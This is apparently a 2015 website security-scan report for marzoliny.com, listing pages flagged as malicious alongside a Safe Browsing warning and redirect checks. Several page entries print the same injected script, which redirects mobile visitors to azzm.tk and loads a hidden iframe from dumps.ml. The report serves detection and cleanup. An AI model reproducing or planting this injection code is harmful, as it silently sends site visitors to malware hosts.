Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=marzoliny.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://marzoliny.com/ | 200 OK Content-Length: 52688 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|iphone|ipad)/i)!==null){ window.location = "http://azzm.tk/?3"; } Decoded script: <iframe src="http://dumps.ml/?1" width="0" height="0" align="left"></iframe> Antivirus reports:
| ||
https://www.google.com/jsapi?ver=4.1.1 | 200 OK Content-Length: 24553 Content-Type: text/javascript | clean |
http://marzoliny.com/wp-content/dfd-cache/scripts/c73416f3397c907cbe1ee201ec5657bd.js | 200 OK Content-Length: 300963 Content-Type: application/javascript | clean |
http://marzoliny.com/wp-content/dfd-cache/scripts/fde79a8fd0f2bf70bca15f68e804932a.js | 200 OK Content-Length: 50884 Content-Type: application/javascript | clean |
http://marzoliny.com/?page_id=5565 | 200 OK Content-Length: 20513 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|iphone|ipad)/i)!==null){ window.location = "http://azzm.tk/?3"; } Decoded script: <iframe src="http://dumps.ml/?1" width="0" height="0" align="left"></iframe> Antivirus reports:
| ||
http://marzoliny.com/?page_id=515 | 200 OK Content-Length: 22787 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|iphone|ipad)/i)!==null){ window.location = "http://azzm.tk/?3"; } Decoded script: <iframe src="http://dumps.ml/?1" width="0" height="0" align="left"></iframe> Antivirus reports:
| ||
http://marzoliny.com/?page_id=516 | 200 OK Content-Length: 19878 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|iphone|ipad)/i)!==null){ window.location = "http://azzm.tk/?3"; } Decoded script: <iframe src="http://dumps.ml/?1" width="0" height="0" align="left"></iframe> Antivirus reports:
| ||
http://marzoliny.com/?page_id=4241 | 200 OK Content-Length: 49999 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|iphone|ipad)/i)!==null){ window.location = "http://azzm.tk/?3"; } Decoded script: <iframe src="http://dumps.ml/?1" width="0" height="0" align="left"></iframe> Antivirus reports:
| ||
http://marzoliny.com/?page_id=5574 | 200 OK Content-Length: 19806 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|iphone|ipad)/i)!==null){ window.location = "http://azzm.tk/?3"; } Decoded script: <iframe src="http://dumps.ml/?1" width="0" height="0" align="left"></iframe> Antivirus reports:
| ||
http://marzoliny.com/?page_id=15 | 200 OK Content-Length: 20143 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|iphone|ipad)/i)!==null){ window.location = "http://azzm.tk/?3"; } Decoded script: <iframe src="http://dumps.ml/?1" width="0" height="0" align="left"></iframe> Antivirus reports:
| ||
http://marzoliny.com/?page_id=863 | 200 OK Content-Length: 21720 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|iphone|ipad)/i)!==null){ window.location = "http://azzm.tk/?3"; } Decoded script: <iframe src="http://dumps.ml/?1" width="0" height="0" align="left"></iframe> Antivirus reports:
| ||
http://marzoliny.com/wp-content/dfd-cache/scripts/fe7a1a37b85d0c502b250397c4697a18.js | 200 OK Content-Length: 300963 Content-Type: application/javascript | clean |
http://marzoliny.com//maps.google.com/maps/api/js?sensor=false/ | 404 Not Found Content-Length: 344 Content-Type: text/html | clean |
http://marzoliny.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://marzoliny.com/wp-content/dfd-cache/scripts/ed3cef70c345af89f63c84dbebcf304c.js | 200 OK Content-Length: 42773 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: marzoliny.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 26 Feb 2015 23:09:09 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
Link: <http://marzoliny.com/>; rel=shortlink
X-Pingback: http://marzoliny.com/xmlrpc.php
X-Powered-By: PHP/5.4.37
GET / HTTP/1.1
Host: marzoliny.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 26 Feb 2015 23:09:09 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
Link: <http://marzoliny.com/>; rel=shortlink
X-Pingback: http://marzoliny.com/xmlrpc.php
X-Powered-By: PHP/5.4.37
Second query (visit from search engine):
GET / HTTP/1.1
Host: marzoliny.com
Referer: http://www.google.com/search?q=marzoliny.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: marzoliny.com
Referer: http://www.google.com/search?q=marzoliny.com
Result:
The result is similar to the first query. There are no suspicious redirects found.